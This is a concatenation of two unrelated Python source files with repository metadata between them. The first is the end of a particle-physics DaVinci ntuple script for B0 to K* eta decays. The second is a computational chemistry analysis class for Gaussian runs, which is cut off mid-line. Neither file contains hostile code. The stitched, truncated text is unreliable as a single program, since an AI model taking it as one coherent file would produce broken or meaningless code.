(K*(892)0 -> K+ pi-) (eta -> pi- pi+ (pi0 -> gamma ^gamma))" : "pi0" , "B~0 -> (K*(892)~0 -> K- pi+) (eta -> pi+ pi- (pi0 -> gamma ^gamma))" : "pi0" , } #==============================REFIT WITH ONLY K* CONSTRAINED=================================== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/KStarOnly') tuple.B0.KStarOnly.Verbose=True tuple.B0.KStarOnly.constrainToOriginVertex=True tuple.B0.KStarOnly.daughtersToConstrain = ["K*(892)0"] #==============================REFIT WITH ONLY PV CONTRAINED============================== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVOnly') tuple.B0.PVOnly.Verbose=True tuple.B0.PVOnly.constrainToOriginVertex=True #========================================REFIT WITH JUST DAUGHTERS CONSTRAINED================================ tuple.B0.addTupleTool('TupleToolDecayTreeFitter/Conskstar_eta') tuple.B0.Conskstar_eta.Verbose=True tuple.B0.Conskstar_eta.constrainToOriginVertex=False tuple.B0.Conskstar_eta.daughtersToConstrain = ["K*(892)0","eta"] #========================================REFIT WITH NOTHING CONSTRAINED======================================== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/Consnothing') tuple.B0.Consnothing.Verbose=True tuple.B0.Consnothing.constrainToOriginVertex=False #========================================LOKI FUBNCTOR VARIABLES======================================== tuple.addBranches({'Kstar' : '[B0 -> ^(K*(892)0 -> K+ pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))]CC', 'eta' : '[B0 -> (K*(892)0 -> K+ pi-) ^(eta -> pi- pi+ (pi0 -> gamma gamma))]CC', 'Kplus' : '[B0 -> (K*(892)0 -> ^K+ pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))]CC', 'piminus' : '[B0 -> (K*(892)0 -> K+ ^pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))]CC', 'piplus' : '[B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- ^pi+ (pi0 -> gamma gamma))]CC', 'piminus0' : '[B0 -> (K*(892)0 -> K+ pi-) (eta -> ^pi- pi+ (pi0 -> gamma gamma))]CC', 'gamma' : '[B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- pi+ (pi0 -> ^gamma gamma))]CC', 'gamma0' : '[B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- pi+ (pi0 -> gamma ^gamma))]CC', 'pi0' : '[B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- pi+ ^(pi0 -> gamma gamma))]CC'}) from LoKiPhys.decorators import MAXTREE,MINTREE,ISBASIC,HASTRACK,SUMTREE,PT,ABSID,NINTREE,ETA,TRPCHI2 B0_hybrid=tuple.B0.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_B0') Kstar_hybrid=tuple.Kstar.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_Kstar') eta_hybrid=tuple.eta.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_eta') Kplus_hybrid=tuple.Kplus.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_Kplus') piminus_hybrid=tuple.piminus.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_piminus') piplus_hybrid=tuple.piplus.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_piplus') piminus0_hybrid=tuple.piminus0.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_piminus0') gamma_hybrid=tuple.gamma.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_gamma') gamma0_hybrid=tuple.gamma0.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_gamma0') pi0_hybrid=tuple.pi0.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_pi0') preamble=[ 'TRACK_MAX_PT= MAXTREE(PT, ISBASIC & HASTRACK, -666)', 'TRACK_MIN_PT= MINTREE(PT, ISBASIC & HASTRACK)', 'SUMTRACK_PT= SUMTREE((211 == ABSID)|(-211 == ABSID)|(321 == ABSID)|(-321 == ABSID),PT)', 'SUM_PCHI2= SUMTREE((211 == ABSID)|(-211 == ABSID)|(321 == ABSID)|(-321 == ABSID),TRPCHI2)' ] B0_hybrid.Preambulo=preamble B0_hybrid.Variables = { 'max_pt_track' : 'TRACK_MAX_PT', 'min_pt_track' : 'TRACK_MIN_PT', 'sum_track_pt' : 'SUMTRACK_PT', 'sum_pchi2' : 'SUM_PCHI2', 'n_highpt_tracks' : 'NINTREE(ISBASIC & HASTRACK & (PT>250.0*MeV))', 'eta' :'ETA' } Kstar_hybrid.Variables ={ 'branch_mass':'MM', 'eta': 'ETA' } eta_hybrid.Variables ={ 'branch_mass':'MM', 'eta': 'ETA' } Kplus_hybrid.Variables ={ 'eta': 'ETA' } piminus_hybrid.Variables ={ 'eta': 'ETA' } piplus_hybrid.Variables ={ 'eta': 'ETA' } piminus0_hybrid.Variables ={ 'eta': 'ETA' } gamma_hybrid.Variables = { 'eta':'ETA' } gamma0_hybrid.Variables = { 'eta':'ETA' } pi0_hybrid.Variables = { 'eta':'ETA' } #==============================MassSubs===================================== from Configurables import TupleToolSubMass tuple.B0.addTool(TupleToolSubMass) tuple.B0.ToolList += ["TupleToolSubMass"] tuple.B0.TupleToolSubMass.Substitution += ["pi- => K-"] tuple.B0.TupleToolSubMass.Substitution += ["K+ => pi+"] tuple.B0.TupleToolSubMass.Substitution += ["pi+ => K+"] tuple.B0.TupleToolSubMass.Substitution += ["pi+ => p+"] tuple.B0.TupleToolSubMass.Substitution += ["pi- => p~-"] tuple.B0.TupleToolSubMass.Substitution += ["K+ => p+"] tuple.B0.TupleToolSubMass.Substitution += ["gamma => pi0"] tuple.B0.TupleToolSubMass.Substitution += ["gamma => e-"] tuple.B0.TupleToolSubMass.Substitution += ["gamma => e+"] tuple.B0.TupleToolSubMass.Substitution += ["pi- => mu-"] tuple.B0.TupleToolSubMass.Substitution += ["pi+ => mu+"] tuple.B0.TupleToolSubMass.Substitution += ["pi0 => eta"] tuple.B0.TupleToolSubMass.DoubleSubstitution += ["K+/pi- => pi+/K-"] tuple.B0.TupleToolSubMass.DoubleSubstitution += ["pi+/pi- => pi-/pi+"] tuple.B0.TupleToolSubMass.DoubleSubstitution += ["pi+/pi- => mu+/mu-"] #==============================TRIGGER DECISIONS==============================- from Configurables import TupleToolTISTOS tistos=tuple.B0.addTupleTool(TupleToolTISTOS, name="TupleToolTISTOS") tistos.VerboseL0=True tistos.VerboseHlt1=True tistos.VerboseHlt2=True tistos.TriggerList=["L0PhotonDecision", "L0ElectronDecision", "Hlt1TrackPhotonDecision", "Hlt1TrackAllL0Decision", "Hlt1TrackMuonDecision", "Hlt1TrackForwardPassThroughDecision", "Hlt1TrackForwardPassThroughLooseDecision", "Hlt1SingleElectronNoIPDecision", "L0HadronDecision", "L0LocalPi0Decision", "L0GlobalPi0Decision", "L0MuonDecision", "Hlt2Topo2BodyBBDTDecision", "Hlt2Topo3BodyBBDTDecision", "Hlt2Topo4BodyBBDTDecision", "Hlt2RadiativeTopoTrackTOSDecision", "Hlt2RadiativeTopoPhotonL0Decision", "Hlt2TopoRad2BodyBBDTDecision", "Hlt2TopoRad2plus1BodyBBDTDecision", "Hlt2Topo2BodySimpleDecision", "Hlt2Topo3BodySimpleDecision", "Hlt2Topo4BodySimpleDecision"] from Configurables import TupleToolL0Calo tuple.Kplus.addTool(TupleToolL0Calo,name="KplusL0Calo") tuple.Kplus.ToolList += ["TupleToolL0Calo/KplusL0Calo"] tuple.Kplus.KplusL0Calo.WhichCalo="HCAL" tuple.piplus.addTool(TupleToolL0Calo,name="piplusL0Calo") tuple.piplus.ToolList += ["TupleToolL0Calo/piplusL0Calo"] tuple.piplus.piplusL0Calo.WhichCalo="HCAL" tuple.piminus.addTool(TupleToolL0Calo,name="piminusL0Calo") tuple.piminus.ToolList += ["TupleToolL0Calo/piminusL0Calo"] tuple.piminus.piminusL0Calo.WhichCalo="HCAL" tuple.piminus0.addTool(TupleToolL0Calo,name="piminus0L0Calo") tuple.piminus0.ToolList += ["TupleToolL0Calo/piminus0L0Calo"] tuple.piminus0.piminus0L0Calo.WhichCalo="HCAL" #================================CONFIGURE TUPLETOOLMCTRUTH======================================================== from Configurables import TupleToolMCTruth tuple.addTool(TupleToolMCTruth) tuple.ToolList += ["TupleToolMCTruth"] tuple.TupleToolMCTruth.ToolList += [ "MCTupleToolHierarchy", "MCTupleToolKinematic", # "MCTupleToolDecayType", # "MCTupleToolReconstructed", # "MCTupleToolPID", # "MCTupleToolP2VV", # "MCTupleToolAngles", # "MCTupleToolInteractions", # "MCTupleToolPrimaries", # "MCTupleToolPrompt" ] etuple=EventTuple() etuple.ToolList=["TupleToolEventInfo"] from Configurables import MCDecayTreeTuple mctuple=MCDecayTreeTuple("mctuple") mctuple.ToolList+=["MCTupleToolKinematic","MCTupleToolReconstructed","MCTupleToolHierarchy","MCTupleToolDecayType","MCTupleToolPID"] mctuple.Decay="[[B0]cc => ^(K*(892)0 => ^K+ ^pi-) ^(eta => ^pi- ^pi+ ^(pi0=> ^gamma ^gamma))]CC" MySequencer.Members.append(etuple) MySequencer.Members.append(tuple) MySequencer.Members.append(mctuple) DaVinci().InputType='DST' DaVinci().UserAlgorithms+=[MySequencer] DaVinci().TupleFile="Output.root" DaVinci().HistogramFile="histos.root" DaVinci().DataType='2012' DaVinci().EvtMax=-1 DaVinci().PrintFreq=1000 DaVinci().MoniSequence=[tuple] DaVinci().Simulation=simulation #from GaudiConf import IOHelper # Use the local input data #IOHelper().inputFiles([ # '00038851_00000006_2.AllStreams.dst' #], clear=True)
Williams224/davinci-scripts
ksteta3pi/NTupleMaker_MagDown.py
Python
mit
17,928
0.01863
# -*- coding: utf-8 -*- from itertools import product, imap import copy import math import string import multiprocessing import platform import numpy as np import pandas as pd from pandas.tools.plotting import radviz import matplotlib.pyplot as plt import matplotlib.cm as cm from matplotlib.colors import ColorConverter from sklearn.cluster import KMeans from IPython.core.display import clear_output from .molecule import Molecule from .utils import df_to_img from .file_io import Folder def unpack_and_make_molecule(val_dict): if val_dict.has_key('args'): args = val_dict.pop('args') else: args = [] return Molecule(*args, **val_dict) class Analysis(object): """a class to analyse multiple computations """ def __init__(self, folderpath='', server=None, username=None, passwrd=None, folder_obj=None, headers=[]): """a class to analyse multiple computations Parameters ---------- folderpath : str the folder directory storing the files to be analysed server : str the name of the server storing the files to be analysed username : str the username to connect to the server passwrd : str server password, if not present it will be asked for during initialisation headers : list the variable categories for each computation """ self._folder = None if folder_obj: self._folder = folder_obj elif folderpath or server: self.set_folder(folderpath, server, username, passwrd) heads = headers[:]+['Molecule'] self._df = pd.DataFrame(columns=heads) self._df.index.name = 'ID' self._next_index = 0 def __repr__(self): return self.get_table().to_string() def copy(self): clone = copy.deepcopy(self) return clone def get_folder(self): return self._folder def set_folder(self, folderpath='', server=None, username=None, passwrd=None): self._folder = Folder(folderpath, server, username, passwrd) folder = property(get_folder, set_folder, doc="The folder for gaussian runs") def count_runs(self): """ get number of runs held in analysis """ return len(self._df.index) def _add_molecule(self, molecule, identifiers): """add molecule to internal dataframe """ identifiers['Molecule'] = molecule series = pd.DataFrame(identifiers, index=[self._next_index]) self._df = self._df.copy().append(series) self._next_index += 1 return True def add_run(self, identifiers={}, init_fname=None, opt_fname=None, freq_fname=None, nbo_fname=None, alignto=[], atom_groups={}, add_if_error=False, folder_obj=None): """add single Gaussian run input/outputs """ if not folder_obj: folder_obj = self._folder molecule = Molecule(init_fname=init_fname, opt_fname=opt_fname, freq_fname=freq_fname, nbo_fname=nbo_fname, folder_obj=folder_obj, alignto=alignto, atom_groups=atom_groups, fail_silently=True) num_files = filter(lambda x:x, [init_fname, opt_fname, freq_fname, nbo_fname]) read_errors = molecule.get_init_read_errors() if len(read_errors) != num_files and (not read_errors or add_if_error): self._add_molecule(molecule, identifiers) return molecule.get_init_read_errors() def _get_molecules(self, mol_inputs, folder_obj, identifiers, ipython_print=False): """ get molecules """ if folder_obj.islocal() and not platform.system() == 'Windows': pool = multiprocessing.Pool(processes=multiprocessing.cpu_count()) mapping = pool.imap else: mapping = imap with folder_obj: molecules=[] all_read_errors = [] for molecule in mapping(unpack_and_make_molecule, mol_inputs): molecules.append(molecule) read_errors = [] for typ, fname, msg in molecule.get_init_read_errors(): idents = identifiers[len(molecules)-1].copy() idents.pop('Molecule', '_') idents['Type'] = typ idents['File'] = fname idents['Error_Message'] = msg read_errors.append(idents) all_read_errors.append(read_errors) if ipython_print: print 'Reading data {0} of {1}'.format(len(molecules), len(mol_inputs)) try: clear_output(wait=True) except: pass if folder_obj.islocal() and not platform.system() == 'Windows': pool.close() pool.join() return molecules, all_read_errors def add_runs(self, headers=[], values=[], init_pattern=None, opt_pattern=None, freq_pattern=None, nbo_pattern=None, add_if_error=False, alignto=[], atom_groups={}, ipython_print=False, folder_obj=None): """add multiple Gaussian run inputs/outputs """ # set folder oject if not folder_obj: folder_obj = self._folder #get variables for each run mol_inputs = [] identifiers = [] for idents in product(*values): mol_input = {} identifiers.append(dict(zip(headers, idents))) mol_input['init_fname'] = init_pattern.format(*idents) if init_pattern else None if type(opt_pattern) is str: mol_input['opt_fname'] = opt_pattern.format(*idents) if opt_pattern else None elif type(opt_pattern) is list or type(opt_pattern) is tuple: mol_input['opt_fname'] = [o.format(*idents) for o in opt_pattern] else: mol_input['opt_fname'] = None mol_input['freq_fname'] = freq_pattern.format(*idents) if freq_pattern else None mol_input['nbo_fname'] = nbo_pattern.format(*idents) if nbo_pattern else None mol_input['folder_obj'] = folder_obj mol_input['alignto'] = alignto mol_input['atom_groups'] = atom_groups mol_input['fail_silently'] = True mol_inputs.append(mol_input) #create the molecules molecules, read_errors = self._get_molecules(mol_inputs, folder_obj, identifiers, ipython_print) #add the molecules to the internal table for molecule, idents, inputs, read_error in zip(molecules, identifiers, mol_inputs, read_errors): num_files = filter(lambda x:x, [inputs['init_fname'], inputs['opt_fname'], inputs['freq_fname'], inputs['nbo_fname']]) if read_error != num_files and (not read_error or add_if_error): self._add_molecule(molecule, idents) #collate read errors into a dataframe to return read_errors = filter(len, read_errors) err_df = pd.DataFrame([item for sublist in read_errors for item in sublist]) if read_errors: cols = err_df.columns.tolist() #rearrange columns headers cols.remove('Type'); cols.append('Type') cols.remove('File'); cols.append('File') cols.remove('Error_Message'); cols.append('Error_Message') err_df = err_df[cols] return err_df def get_table(self, rows=[], columns=[], filters={}, precision=4, head=False, mol=False, row_index=[], column_index=[], as_image=False, na_rep='-', font_size=None, width=None, height=None, unconfined=False): """return pandas table of requested data in requested format Parameters ----------- rows : integer or list of integers select row ids columns : string/integer or list of strings/integers select column names/positions filters : dict filter for rows with certain value(s) in specific columns precision : int decimal precision of displayed values head : int return only first n rows mol : bool include column containing the molecule objects row_index : string or list of strings columns to use as new index column_index : list of strings srings to place in to higher order column indexs as_image : bool output the table as an image (used pygauss.utils.df_to_img) na_rep : str how to represent empty (nan) cells (if outputting image) width, height, unconfined : int, int, bool args for IPy Image Returns ------- df : pandas.DataFrame a table of data """ pd.set_option('precision', precision) if mol: df = self._df.copy() else: df = self._df.drop('Molecule', axis=1) for key, val in filters.iteritems(): if type(val) is list or type(val) is tuple: df = df[getattr(df, key).isin(val)] else: df = df[getattr(df, key)==val] if type(rows) is not list and type(rows) is not tuple: rows = [rows] if type(columns) is not list and type(columns) is not tuple: columns = [columns] if rows: df = df.loc[rows] if columns: cols = columns[:] if type(row_index) is list: cols += row_index else: cols.append(row_index) if mol: cols.append('Molecule') unique_cols = [] [unique_cols.append(x) for x in cols if x not in unique_cols] df = df.ix[:,unique_cols] if row_index: df = df.set_index(row_index) if column_index: col_index=[] for col in df.columns: col_tuple = (' ', col) for term in column_index: if len(col)>len(term): if col[:len(term)] == term: col_tuple = (term, col[len(term)+1:]) continue col_index.append(col_tuple) df.columns = pd.MultiIndex.from_tuples(col_index) if head: df = df.head(head) if as_image: return df_to_img(df, na_rep=na_rep, font_size=font_size, width=width, height=height, unconfined=unconfined) return df def remove_rows(self, rows): """remove one or more rows of molecules Parameters ---------- rows : int or list of ints: the rows to remove """ self._df.drop(rows, inplace=True) return self.get_table() def remove_columns(self, columns): self._df.drop(columns, axis=1, inplace=True) return self.get_table() _basic_properties={'nbasis':'get_basis_funcs', 'basis':'get_basis_descript', 'optimised':'is_optimised', 'opt_error': 'get_run_error', 'conformer': 'is_conformer'} def get_basic_property(self, prop, *args, **kwargs): """returns a series of a basic run property or nan if it is not available Parameters ---------- prop : str can be 'basis', 'nbasis', 'optimised', 'opt_error' or 'conformer' """ if prop not in self._basic_properties.keys(): raise ValueError('{0} not a molecule property'.format(prop)) def get_prop(m): method = getattr(m, self._basic_properties[prop]) try: out = method(*args, **kwargs) except: out = pd.np.nan return out return self._df.Molecule.map(get_prop) def add_basic_properties(self, props=['basis', 'nbasis', 'optimised', 'conformer']): """adds columns giving info of basic run properties """ for prop in props: try: series = self.get_basic_property(prop) except Exception: print 'error reading {0} \n setting to NaN'.format(prop) series = pd.np.nan self._df[prop.capitalize()] = series return self.get_table() def remove_non_optimised(self): """removes runs that were not optimised """ non_optimised = self._df[self.get_basic_property('optimised')!=True].copy() self._df = self._df[self.get_basic_property('optimised')==True] return non_optimised def remove_non_conformers(self, cutoff=0.): """removes runs with negative frequencies """ non_conformers = self._df[self.get_basic_property('conformer', cutoff=cutoff)!=True].copy() self._df = self._df[self.get_basic_property('conformer', cutoff=cutoff)==True] return non_conformers def add_mol_property(self, name, method, *args, **kwargs): """compute molecule property for all rows and create a data column Parameters ---------- name : str what to name the data column method : str what molecule method to call *args : various arguments to pass to the molecule method **kwargs : various keyword arguments to pass to the molecule method """ if type(name) is tuple or type(name) is list: for idx, n in enumerate(name): func = lambda m: getattr(m, method)(*args, **kwargs)[idx] self._df[n] = self._df.Molecule.map(func) else: func = lambda m: getattr(m, method)(*args, **kwargs) self._df[name] = self._df.Molecule.map(func) return self.get_table() def add_mol_property_subset(self, name, method, rows=[], filters={}, args=[], kwargs={}, relative_to_rows=[]): """compute molecule property for a subset of rows and create/add-to data column Parameters ---------- name : str or list of strings name for output column (multiple if method outputs more than one value) method : str what molecule method to call rows : list what molecule rows to calculate the property for filters : dict filter for selecting molecules to calculate the property for args : list the arguments to pass to the molecule method kwargs : dict the keyword arguments to pass to the molecule method relative_to_rows: list of ints compute values relative to the summated value(s) of molecule at the rows listed """ df = self.get_table(rows=rows, filters=filters, mol=True) if relative_to_rows: rel_df = self.get_table(rows=relative_to_rows, mol=True) if type(name) is tuple or type(name) is list: for idx, n in enumerate(name): func = lambda m: getattr(m, method)(*args, **kwargs)[idx] vals = df.Molecule.map(func) if relative_to_rows: rel_val = rel_df.Molecule.map(func).sum() vals = vals - rel_val if n in self._df.columns: self._df[n] = vals.combine_first(self._df[n]) else: self._df[n] = vals else: func = lambda m: getattr(m, method)(*args, **kwargs) vals = df.Molecule.map(func) if relative_to_rows: rel_val = rel_df.Molecule.map(func).sum() vals = vals - rel_val if name in self._df.columns: self._df[name] = vals.combine_first(self._df[name]) else: self._df[name] = vals return self.get_table() def get_ids(self, variable_names, variable_lists): """return ids of a list of unique computations """ df = self.get_table() df['Index'] = df.index df.set_index(variable_names, inplace=True) df.sortlevel(inplace=True) ids = [] for variable_lst in variable_lists: df1 = df.copy() try: for v in variable_lst: df1 = df1.loc[v] except KeyError: raise ValueError( 'could not find variable set; {}'.format(variable_lst)) i = df1.Index if hasattr(i, 'values'): raise ValueError( 'variable set is not unique; {}'.format(variable_lst)) ids.append(int(i)) return ids def get_molecule(self, row): """ get molecule object coresponding to particular row """ return copy.deepcopy(self._df.Molecule.loc[row]) ## TODO will active work? def yield_mol_images(self, rows=[], filters={}, mtype='optimised', sort_columns=[], align_to=[], rotations=[[0., 0., 0.]], gbonds=True, represent='ball_stick', zoom=1., width=300, height=300, axis_length=0, background='white', relative=False, minval=-1, maxval=1, highlight=[], active=False, sopt_min_energy=20., sopt_cutoff_energy=0., atom_groups=[], alpha=0.5, transparent=False, hbondwidth=5, eunits='kJmol-1', no_hbonds=False, ipyimg=True): """yields molecules Parameters ---------- mtype : 'initial', 'optimised', 'nbo', 'highlight', 'highlight-initial', 'sopt' or 'hbond' info_columns : list of str columns to use as info in caption max_cols : int maximum columns in plot label_size : int subplot label size (pts) start_letter : str starting (capital) letter for labelling subplots save_fname : str name of file, if you wish to save the plot to file rows : int or list index for the row of each molecule to plot (all plotted if empty) filters : dict {columns:values} to filter by sort_columns : list of str columns to sort by align_to : [int, int, int] align geometries to the plane containing these atoms rotations : list of [float, float, float] for each rotation set [x,y,z] an image will be produced gbonds : bool guess bonds between atoms (via distance) represent : str representation of molecule ('none', 'wire', 'vdw' or 'ball_stick') zoom : float zoom level of images width : int width of original images height : int height of original images (although width takes precedent) axis_length : float length of x,y,z axes in negative and positive directions background : matplotlib.colors background color relative : bool coloring of nbo atoms scaled to min/max values in atom set (for nbo mtype) minval : float coloring of nbo atoms scaled to absolute min (for nbo mtype) maxval : float coloring of nbo atoms scaled to absolute max (for nbo mtype) highlight : list of lists atom indxes to highlight (for highlight mtype) eunits : str the units of energy to return (for sopt/hbond mtype) sopt_min_energy : float minimum energy to show (for sopt/hbond mtype) sopt_cutoff_energy : float energy below which bonds will be dashed (for sopt mtype) alpha : float alpha color value of geometry (for highlight/sopt/hbond mtypes) transparent : bool whether atoms should be transparent (for highlight/sopt/hbond mtypes) hbondwidth : float width of lines depicting interaction (for hbond mtypes) atom_groups : [list or str, list or str] restrict interactions to between two lists (or identifiers) of atom indexes (for sopt/hbond mtypes) no_hbonds : bool whether to ignore H-Bonds in the calculation ipyimg : bool whether to return an IPython image, PIL image otherwise Yields ------- indx : int the row index of the molecule mol : IPython.display.Image or PIL.Image an image of the molecule in the format specified by ipyimg """ df = self.get_table(columns=['Molecule']+sort_columns, rows=rows, filters=filters, mol=True) if sort_columns: df.sort(sort_columns, inplace=True) show_kwargs = {'gbonds':gbonds, 'represent':represent, 'rotations':rotations, 'zoom':zoom, 'width':width, 'height':height, 'background':background, 'axis_length':axis_length, 'ipyimg':ipyimg} for indx, mol in zip(df.index, df.Molecule): if align_to: align_atoms = mol.get_atom_group(align_to) mol.set_alignment_atoms(*align_atoms) if mtype == 'initial': yield indx, mol.show_initial(**show_kwargs) elif mtype == 'optimised': yield indx, mol.show_optimisation(**show_kwargs) elif mtype == 'nbo': yield indx, mol.show_nbo_charges(relative=relative, minval=minval, maxval=maxval, **show_kwargs) elif mtype == 'highlight': yield indx, mol.show_highlight_atoms(highlight, alpha=alpha, optimised=True, transparent=transparent, **show_kwargs) elif mtype == 'highlight-initial': yield indx, mol.show_highlight_atoms(highlight, alpha=alpha, optimised=False, transparent=transparent, **show_kwargs) elif mtype == 'sopt': yield indx, mol.show_sopt_bonds(min_energy=sopt_min_energy, cutoff_energy=sopt_cutoff_energy, no_hbonds=no_hbonds, eunits=eunits, atom_groups=atom_groups, alpha=alpha, transparent=transparent, relative=relative, minval=minval, maxval=maxval, **show_kwargs) elif mtype == 'hbond': yield indx, mol.show_hbond_analysis(min_energy=sopt_min_energy, cutoff_energy=sopt_cutoff_energy, eunits=eunits, atom_groups=atom_groups, bondwidth=hbondwidth, alpha=alpha, transparent=transparent, relative=relative, minval=minval, maxval=maxval, **show_kwargs) else: raise ValueError( 'mtype must be initial, optimised, nbo, highlight, highligh-initial, sopt or hbond') def _get_letter(self, number): """get an uppercase letter according to a number""" if number < 26: return string.ascii_uppercase[number] else: first_letter = string.ascii_uppercase[int(number/26)-1] second_letter = string.ascii_uppercase[number % 26] return first_letter + second_letter def plot_mol_images(self, mtype='optimised', max_cols=1, padding=(1, 1), sort_columns=[], info_columns=[], info_incl_id=False, label_size=20, letter_prefix='', start_letter='A', rows=[], filters={}, align_to=[], rotations=[[0., 0., 0.]], gbonds=True, represent='ball_stick', zoom=1., width=500, height=500, axis_length=0, background='white', relative=False, minval=-1, maxval=1, highlight=[], frame_on=False, eunits='kJmol-1', sopt_min_energy=20., sopt_cutoff_energy=0., atom_groups=[], alpha=0.5, transparent=False, hbondwidth=5, no_hbonds=False): """show molecules in matplotlib table of axes Parameters ---------- mtype : 'initial', 'optimised', 'nbo', 'highlight', 'highlight-initial', 'sopt' or 'hbond' max_cols : int maximum columns in plot padding: tuple padding between images (horizontally, vertically) sort_columns : list of str columns to sort by info_columns : list of str columns to use as info in caption info_incl_id : bool include molecule id number in caption label_size : int subplot label size (pts) letter_prefix : str prefix for labelling subplots start_letter : str starting (capital) letter for labelling subplots rows : int or list index for the row of each molecule to plot (all plotted if empty) filters : dict {columns:values} to filter by align_to : [int, int, int] align geometries to the plane containing these atoms rotations : list of [float, float, float] for each rotation set [x,y,z] an image will be produced gbonds : bool guess bonds between atoms (via distance) represent : str representation of molecule ('none', 'wire', 'vdw' or 'ball_stick') zoom : float zoom level of images width : int width of original images height : int height of original images (although width takes precedent) axis_length : float length of x,y,z axes in negative and positive directions background : matplotlib.colors background color relative : bool coloring of nbo atoms scaled to min/max values in atom set (for nbo mtype) minval : float coloring of nbo atoms scaled to absolute min (for nbo mtype) maxval : float coloring of nbo atoms scaled to absolute max (for nbo mtype) highlight : list of lists atom indxes to highlight (for highlight mtype) eunits : str the units of energy to return (for sopt/hbond mtype) sopt_min_energy : float minimum energy to show (for sopt/hbond mtype) sopt_cutoff_energy : float energy below which bonds will be dashed (for sopt mtype) alpha : float alpha color value of geometry (for sopt/hbond mtypes) transparent : bool whether atoms should be transparent (for sopt/hbond mtypes) hbondwidth : float width of lines depicting interaction (for hbond mtypes) atom_groups : [list or str, list or str] restrict interactions to between two lists (or identifiers) of atom indexes (for sopt/hbond mtypes) no_hbonds : bool whether to ignore H-Bonds in the calculation (for sopt only) frame_on : bool whether to show frame around each image Returns ------- fig : matplotlib.figure.Figure A figure containing subplots for each molecule image caption : str A caption describing each subplot, given info_columns """ letter_offset = string.ascii_uppercase.find(start_letter) if letter_offset == -1: raise ValueError('start_letter must be an uppercase single letter') df = self.get_table(rows=rows, columns=info_columns, filters=filters) num_mols = len(df) imgs = self.yield_mol_images(rows=rows, filters=filters, mtype=mtype, align_to=align_to, gbonds=gbonds, represent=represent, sort_columns=sort_columns, rotations=rotations, zoom=zoom, width=width, height=height, axis_length=axis_length, relative=relative, minval=minval, maxval=maxval, highlight=highlight, active=False, ipyimg=False, eunits=eunits, sopt_min_energy=sopt_min_energy, sopt_cutoff_energy=sopt_cutoff_energy, atom_groups=atom_groups, alpha=alpha, transparent=transparent, background=background, hbondwidth=hbondwidth, no_hbonds=no_hbonds) #num_rows = int(math.ceil(num_mols/float(max_cols))) #num_cols = min([max_cols, num_mols]) num_cols=int(max_cols) num_rows=int(math.ceil(num_mols/float(num_cols))) fig, axes = plt.subplots(num_rows, num_cols, squeeze=False, gridspec_kw={'width_ratios':[1]*num_cols}) fig.set_facecolor(background) r,g,b = ColorConverter().to_rgb(background) if ( .241*(255*r)**2 + .691*(255*g)**2 + .068*(255*b)**2 )**0.5 < 130.: label_color = 'white' else: label_color = 'black' for ax in fig.get_axes(): ax.axes.get_xaxis().set_visible(False) ax.axes.get_yaxis().set_visible(False) ax.set_anchor('NW') ax.set_frame_on(False) mol_num = 0 caption = [] for indx, img in imgs: ax = axes[int(math.ceil((mol_num+1)/float(max_cols)))-1, mol_num % max_cols] ax.imshow(img)#, aspect='equal') ax.set_frame_on(frame_on) if label_size: ax.text(0,0.8,letter_prefix+self._get_letter(mol_num+letter_offset), size=label_size, weight="bold", color=label_color) info = ', '.join(df[info_columns].loc[indx].fillna('-').astype(str)) if info_incl_id: info = str(indx) + ', ' + info caption.append( '(' + letter_prefix+self._get_letter(mol_num+letter_offset) + ') ' + info) mol_num += 1 #resize extra axes to be same as last img while mol_num < num_rows*num_cols: ax = axes[int(math.ceil((mol_num+1)/float(max_cols)))-1, mol_num % max_cols] ax.imshow(img) ax.clear() mol_num += 1 fig.tight_layout(w_pad=padding[0], h_pad=padding[1]) caption = ', '.join(caption) #insert newline character every 80 charaters #caption = re.sub("(.{80})", "\\1\n", caption, 0, re.DOTALL) return fig, caption def plot_mol_graphs(self, gtype='energy', share_plot=False, max_cols=1, padding=(1,1), tick_rotation=0, rows=[], filters={}, sort_columns=[], info_columns=[], info_incl_id=False, letter_prefix='', start_letter='A', grid=True, sharex=True, sharey=True, legend_size=10, color_scheme='jet', eunits='eV', per_energy=1., lbound=None, ubound=None, color_homo='g', color_lumo='r', homo_lumo_lines=True,homo_lumo_values=True,band_gap_value=True): """get a set of data plots for each molecule Parameters ---------- gtype : str the type of plot, energy = optimisation energies, freq = frequency analsis, dos = Densty of States, share_plot : bool whether to plot all data on the same or separate axes max_cols : int maximum columns on plots (share_plot=False only) padding: tuple padding between images (horizontally, vertically) tick_rotation : int rotation of x-axis labels rows : int or list index for the row of each molecule to plot (all plotted if empty) filters : dict {columns:values} to filter by sort_columns : list of str columns to sort by info_columns : list of str columns to use as info in caption info_incl_id : bool include molecule id number in labels letter_prefix : str prefix for labelling subplots (share_plot=False only) start_letter : str starting (capital) letter for labelling subplots (share_plot=False only) grid : bool whether to include a grid in the axes sharex : bool whether to align x-axes (share_plot=False only) sharey : bool whether to align y-axes (share_plot=False only) legend_size : int the font size (in pts) for the legend color_scheme : str the scheme to use for each molecule (share_plot=True only) according to http://matplotlib.org/examples/color/colormaps_reference.html eunits : str the units of energy to use per_energy : float energy interval to group states by (DoS only) lbound : float lower bound energy (DoS only) ubound: float upper bound energy (DoS only) color_homo : matplotlib.colors color of homo in matplotlib format color_lumo : matplotlib.colors color of lumo in matplotlib.colors homo_lumo_lines : bool draw lines at HOMO and LUMO energies homo_lumo_values : bool annotate HOMO and LUMO lines with exact energy values band_gap_value : bool annotate inbetween HOMO and LUMO lines with band gap value Returns ------- data : matplotlib.figure.Figure plotted frequency data caption : str A caption describing each subplot, given info_columns """ df = 